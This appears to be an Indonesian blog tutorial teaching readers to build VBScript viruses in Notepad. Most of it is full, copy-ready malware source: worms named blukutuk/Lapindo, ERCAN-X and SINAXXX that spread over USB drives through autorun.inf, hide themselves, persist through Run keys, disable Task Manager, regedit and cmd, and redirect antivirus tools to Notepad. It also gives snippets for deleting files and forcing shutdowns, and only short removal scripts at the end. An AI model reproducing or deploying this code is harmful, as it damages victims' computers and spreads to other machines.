Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
Reg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableTaskMgr", "1", "REG_DWORD"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskMgr.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","Notepad.exe"
End Sub
Sub Samar
On Error Resume Next
Dim HandleDoc, HandleVbs
HandleDoc = "HKEY_CLASSES_ROOT\" & BacaHandle("doc")
HandleVbs = "HKEY_CLASSES_ROOT\" & BacaHandle("VBS")
Reg.RegWrite HandleVbs & "\", Reg.RegRead(HandleDoc & "\")
Reg.RegWrite HandleVbs & "\DefaultIcon\", Reg.RegRead(HandleDoc & "\DefaultIcon\")
Reg.RegWrite HandleVbs & "\NeverShowExt",""
Reg.RegWrite "HKCR\VBSFile\FriendlyTypeName", Reg.RegRead(HandleDoc & "\")
End Sub
Sub ShortCut
On Error Resume Next
Dim lnk, lok
lok = Reg.SpecialFolders("Favorites") & "\blukutuk.lnk"
Set lnk = Reg.CreateShortCut(lok)
Induk.Copy (Reg.SpecialFolders("AppData") & "\blukutuk.vbs")
lnk.TargetPath = Reg.ExpandEnvironmentStrings(Reg.SpecialFolders("AppData") & "\blukutuk.vbs")
lnk.Save
HilangFile (lok)
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\blukutuk", lok
End Sub
Sub HilangFile (AlamatFile)
Dim f1
Set f1 = fso.GetFile(AlamatFile)
f1.Attributes = 6
End sub
Sub CopyVbs (Alamat)
On Error Resume Next
Dim data, ts, s, a, tf
Randomize
data = Left(Rnd(15) * 10000000000, 10)
Set ts = fso.openTextFile(Induk, 1)
a = ts.ReadAll
s = Right(a, Len(a) -28)
ts.Close
Set tf = fso.CreateTextFile(Alamat, True)
tf.WriteLine ("Rem sidoarjocity" & data)
tf.Write s
tf.Close
Set ts = fso.GetFile(Alamat)
ts.Attributes = 1
End sub
Function BacaHandle(TipeFile)
BacaHandle = reg.RegRead ("HKEY_CLASSES_ROOT\." & TipeFile & "\")
End Function
Sub KillVBS(alamat)
On Error Resume Next
Dim ts, s, i, a, b
Set ts = fso.openTextFile(alamat, 1)
s = ts.Readline
ts.Close
a = instr(s, "sidoarjocity")
If a = 0 Or a = "" Then
Set ts = fso.GetFile(alamat)
ts.Attributes = 0
Set ts = fso.openTextFile(Induk, 1)
i = ts.ReadAll
ts.Close
Set ts = fso.CreateTextfile(alamat, True)
ts.Write i
ts.Close
End If
End sub
sub AlwaysRun
On Error Resume Next
Dim mf, check
If Wscript.ScriptFullname = Reg.SpecialFolders("AppData") & "\blukutuk.vbs" then
Do
Set mf = fso.getfile(Wscript.ScriptFullname)
check = mf.Drive.drivetype
If check <> 1 Then Wscript.sleep 200000
Reg.run fso.getspecialfolder(0) & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
AutoFlash
Sebar1
SerangDrive("d:\")
SerangDrive("e:\")
Loop While check <> 1
End If
End sub
Sub Sebar1
dim nilai
nilai=Left(Reg.SpecialFolders("Desktop"),3) & "Windows\System.vbs"
CopyVBS (nilai)
HilangFile(nilai)
SerangFolder(Reg.SpecialFolders("MyDocuments"))
CopyVbs(Reg.SpecialFolders("NetHood") & "\Ceritaku.txt.vbs")
End Sub
Sub SerangRecent
On Error Resume Next
Dim target, ok
For Each target in fso.GetFolder(Reg.SpecialFolders("Recent")).Files
Set ok = reg.CreateShortCut(target)
if fso.FolderExists(ok.WorkingDirectory) then SerangFolder (ok.WorkingDirectory)
Next
End sub
Rem Created by Vir.VBS Generator V.1
2. Kalau udah selesai di copy paste aja di notepad, jadi gak perlu nulis sak’abreg gtu . .
3. Kemudian simpan [File>>Save As] kasih nama “Lapindo.vbs” [Inget harus pake tanda kutip,jangan lupa]
4.Jadi dech tuch virus, kalau kamu klik [jangan dech,agak berbahaya soalnya]
Catatan:
Kalau kamu pake Anti Virus Avira [yang gambar red umbrella] maka langsung kedetect dengan nama VBS/Autorun.T . . .
Terus kalau kamu coba klik, maka sesuai namanya “Lapindo” kompi kamu yang pake anti virus AVG.Avira,Norton akan ditenggelamin alias gak fungsi lagi…
Dan masih banyak efek lainnya
So becareful
Akhirnya cukup sudah penjelasan mengenai buat virus pake notepad,dan inget aturan mainnya For Education Only. . . Kalau ada yang tertarik,lain kali buat lagi yang lebih ganaszzz, hehheheeh
1.mendisable registry
1.Masuk Notepad kemudian tulis script di bawah ini :
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\poli cies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide
sebenarnya banyak cara untuk mendisable regedit. misalnya kayak gini:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT _USER\software\microsoft\windows\currentversion\po licies\systemdisableregistrytools", 1, "REG_DWORD"
2.save dengan nama yang kmska.vbs
2.Membuat Virus yang Dapat Mengopykan Diri Ke Derektory Lain
Masuk Notepad kemudian tulis script di bawah ini :
CreateObject("Scripting.FileSystemObject").
GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject("scripting.filesystemobject").copyfil e wscript.scriptfullname,
createobject("scripting.filesystemobject")
.getspecialfolder(1) & "\virus.vbs"
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary
2.simpan dengan nama yg km ska.vbs
3.Membuat Virus Pembunuh Proses
Masuk Notepad kemudian tulis script di bawah ini :
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide
2.save eksistensinya vbs
4.Menjalankan Virus Pada Saat Startup Atau Saat Windows Dihidupkan
On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\Curr entVersion\Run\virus"
, "c:\windows\system32\virus.vbs"
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)
2.simpan dalam bentuk eksistensi reg(caranya sma ama vbs)
5.Membuat Virus Yang Dapat Menghapus File/Folder
Masuk Notepad kemudian tulis script di bawah ini, agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)
Contoh :
On Error resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe”
hapus.DeleteFolder “C:\antivirus”
Simpan script tersebut dalam bentuk file.vbs, misal: virusdeleted.vbs
6.Membuat Virus Yang Dapat Merestart Windows
Masuk Notepad kemudian tulis script di bawah ini :
CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide
merestart windows dalam waktu 60 sekon
Simpan script tersebut dalam bentuk file.vbs, misal: virusrestart.vbs
7.Membuat Virus Yang Dapat Men-Shutdown Dan Merestart Windows
Masuk Notepad kemudian tulis script di bawah ini :
CreateObject("WScript.Shell").run "shutdown -s -f -t 60", vbhide
Mematikan windows dalam waktu 60 sekon
“shutdown -s -f -t 60"
S = untuk shutdown dan
R = untuk reboot\restart
Simpan script tersebut dalam bentuk file.vbs, misal : virusshutdown.vbs
*bila virus tidak jalan coba periksa kembali spasi ama tanda kutipnya*
VIRUS NOTEPAD ERCAN-X
Caranya sama dengan yang sebelumnya copy paste kata-kata dibawah ini
on error resume next
dim rekur,windowpath,desades,fs,mf,isi,tf,ercan,nt,check,sd
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe 3rc4nms32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs ")
tf.attributes = 32
set tf = fs.createtextfile(windowpath & "\3rc4n-x.dll.vbs",2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs")
tf.attributes = 39
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(desades.path &"\3rc4nms32.dll.vbs",2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes = 39
set tf =fs.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
set ercan = createobject("WScript.Shell")
ercan.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: -> ERCAN-X<- ::" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "THE ERCAN-X" ercan.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","No reason for Panic" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- 3rc4n.dll.vbs" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe" if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama 3rc4nms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan ERCAN-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka adalah "Notepad"
SEKARANG KITA BUAT ANTINYA VIRUSNYA :
[Version]
Signature="$Chicago$"
Provider=Ercan
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, "INTERNET EXPLORER"
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
Save as dangan kata ‘’verdhy.vbs’’ (tanpa tanda petik)
virus dibawah ini bisa menduplikasikan file
”Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus”
on error resume next
”Dim (pendeklarasian) kata-kata berikut ini”
dim rekursif,winpath,flashdrive,fs,mf,atr,tf,sina,nt,check,sd
”Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information”
atr = “[autorun]” & vbcrlf & “shellexecute=wscript.exe sinaxxx.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekursif = rekursif & text.readline
rekursif = rekursif & vbcrlf
loop
do
”Menduplikasikan diri untuk menjadi file induk di Windows Path (example: C:\Windows)”
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\SINAXXX.vbs”)
tf.attributes = 32
set tf = fs.createtextfile(winpath & “\SINAXX.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(winpath & “\SINAXXX.vbs”)
tf.attributes = 39
“Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok dan Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket”
for each flashdrive in fs.drives
”Perintah untuk mengeCek Drive”
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
”membuat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\”
set tf = fs.getfile(flashdrive.path &”\SINAXXXa.vbs”)
tf.attributes = 32
set tf = fs.createtextfile(flashdrive.path &”\SINAXXX.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(flashdrive.path &”\SINAXXX.vbs”)
tf.attributes = 39
“Membuat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)”
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf = fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 39
end if
next
”Memanipulasi Registry”
set sina = createobject(”WScript.Shell”)
”Ubah CAPTION Internet Explorer menjadi komputer Anda terinfeksi Vrs SINAXXX”
sina.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”komputer Anda terinfeksi Vrs SINAXXX”
”Set agar file hidden tidak ditampilkan di Explorer”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\Advanced\Hidden”, “1″, “REG_DWORD”
”Hilangkan menu Find, Folder Options, Run, LogOff, dan memblokir Regedit dan Task Manager”
sinaRegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoFind”, “1″, “REG_DWORD”
sina.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoRun”, “1″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoLogOff”, “0″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
”Mendisablekan klik kanan”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
”Memunculkan Pesan Setiap Windows Startup”
sina.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption”,
“SINAXXX.”
sina.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”,
“kami dari keluarga SINA memohon maaf atas virus SINAXXX !!!!”
”Mengaktifkan virus sinaxxx.vbs setiap Windows Startup”
sina.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\SINAXXX.vbs “
“Menghilangkan menu Close”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, “0″, “REG_DWORD”
”Mengubah RegisteredOwner dan Organization”
sina.regwrite“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\RegisteredOrganization”, “The SINAXXX”sina.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”SINAXXX”
”Akhir dari Kode”
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
untuk membuat Virus dari litsing diatas. kamu cukup meng-COPY Listing tersebut kedalam NOTPED dan kemudian
di SAVE dengan nama file yang berektensi vbs misal : sinaxxx.vbs.
PERLU DI PERHATKAN !!!!!
SETALAH KAMU COPY LISTING TSB JANGAN LUPA MENGHAPUS KOMENTARNYA ..YANG DI APIT TANDA ( “ ) KUTIP.!!!!
Membuat Anti virus Kspoold dgn NotePad
Virus Kspoold sebenernya bukan virus yg merusak Sistem.Mereka tidak memBlok fitur2 Windows seperti Task Manager,Run,Registry Editor dll.Tapi mereka meng-Infect file2 Word,Exel dll.Jadi pembuatan removalnya-pun lebih mudah.Tapi tidak ada salahnya kita belajar untuk membuat Anti-Virus Kspoold kita sendiri...ya kan?Sekarang kita akan membuat Kspoold removal hanya dng berbekal NotePad.
Echo off
Cls
REM - Ubah Warna
Color A
REM - Ubah Judul
Title Kspoold Killer * By vErdHy (Atau nama anda sendiri)
REM - Masuk ke Direktori Sistem
%SYSTEMDRIVE%
cd %SYSTEMROOT%\System32
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo KSPOOLD KILLER
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo After you press any key on your keyboard, i do...
Echo - Removing Related Registry
Echo - Stopping Kspoold Process
Echo - Deleting Kspoold file in the system directory
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo.
Pause
Echo.
REM - Hapus Registry yg di buat sebagai service virus
Reg delete "HKEY_MACHINE_\SYSTEM\ControlSet001\Service\KspooldDaemon" /f
Reg delete "HKEY_MACHINE_\SYSTEM\ControlSet002\Service\KspooldDaemon" /f
Reg delete "HKEY_MACHINE_\SYSTEM\CurentControlSet\Service\KspooldDaemon"/f
REM - Hentikan Proses Virus
TaskKill /IM Kspoold.exe /F /T
REM - Set Atribut file Virus menjadi normal
Attrib -s -h -r Kspoold.exe
REM - Hapus file Virus
Del Kspoold.exe
Cls
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo KSPOOLD KILLER
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo After you press any key on your keyboard, i do...
Echo - Removing Related Registry
Echo - Stopping Kspoold Process
Echo - Deleting Kspoold file in the system directory
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo.
Echo Press any key to continue...
Echo.
Echo Well done -The "Kspoold" was completely removed
Echo.
Pause
Copy paste Script di atas ke dalam NotePad, dan simpan sebagai
‘’Verdhy Kspoold.BAT’’ (tanpa tanda petik)
Setelah di simpan, silakan jalankan dng cara mengKlik dua kali pada file Verdhy Kspoold.BAT
Komentar